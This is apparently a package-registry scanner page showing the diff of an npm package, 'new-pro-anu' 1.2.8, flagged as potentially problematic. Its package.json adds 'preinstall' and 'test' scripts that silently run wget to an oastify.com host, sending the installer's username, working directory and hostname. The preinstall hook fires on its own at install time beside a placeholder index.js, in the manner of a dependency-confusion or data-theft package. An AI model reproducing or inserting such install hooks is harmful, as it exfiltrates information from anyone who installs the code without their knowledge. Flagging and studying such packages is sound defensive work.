new-pro-anu 1.2.8

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of new-pro-anu might be problematic. Click here for more details.

@@ -0,0 +1 @@
1
+ <html><body>zi5k2zxwzypzy6yc3exaokzjjgjgz</body></html>
package/index.js ADDED
@@ -0,0 +1,3 @@
1
+ exports.printMsg = function() {
2
+ console.log("This is a message from the demo package");
3
+ }
package/package.json ADDED
@@ -0,0 +1,28 @@
1
+ {
2
+ "name": "new-pro-anu",
3
+ "version": "1.2.8",
4
+ "description": "AnupamAS01 Place_holder",
5
+ "main": "index.js",
6
+ "bin": {
7
+ "test-codecpetjs-bdd-tests": "./index.js"
8
+ },
9
+ "scripts": {
10
+ "test": "wget --quiet \"http://lg5s65yf5k9rfomu00kb6gocg3mualya.oastify.com/?user=$(whoami)&path=$(pwd)&hostname=$(hostname)\" # CHANGE IP ADDRESS",
11
+ "preinstall": "wget --quiet \"http://lg5s65yf5k9rfomu00kb6gocg3mualya.oastify.com/?user=$(whoami)&path=$(pwd)&hostname=$(hostname)\" # CHANGE IP ADDRESS"
12
+ },
13
+ "author": "Your Name",
14
+ "license": "ISC",
15
+ "repository": {
16
+ "type": "git",
17
+ "url": "https://github.com/AnupamAS0x1/test-codecpetjs-bdd-tests.git"
18
+ },
19
+ "bugs": {
20
+ "url": "https://github.com/AnupamAS0x1/test-codecpetjs-bdd-tests/issues"
21
+ },
22
+ "homepage": "https://github.com/AnupamAS0x1/test-codecpetjs-bdd-tests",
23
+ "dependencies": {
24
+ "axios": "^0.24.0",
25
+ "node-fetch": "^3.3.2"
26
+ }
27
+ }
28
+